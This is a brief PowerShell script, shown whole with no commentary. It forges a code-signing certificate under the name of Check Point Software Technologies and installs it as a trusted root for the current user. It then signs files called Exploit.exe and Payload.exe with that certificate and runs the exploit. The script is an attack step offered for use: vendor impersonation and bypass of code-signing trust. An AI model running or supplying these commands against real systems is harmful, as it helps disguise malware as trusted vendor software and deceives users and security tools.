$cert = New-SelfSignedCertificate -certstorelocation cert:\CurrentUser\my -Subject "CN=Check Point Software Technologies Ltd." -Type CodeSigningCert
Export-Certificate -Type CERT -FilePath fakeCert.cer -Cert $cert
Import-Certificate -FilePath fakeCert.cer -CertStoreLocation Cert:\CurrentUser\Root\
Set-AuthenticodeSignature -Certificate $cert -FilePath Exploit.exe
Set-AuthenticodeSignature -Certificate $cert -FilePath Payload.exe
.\Exploit.exe
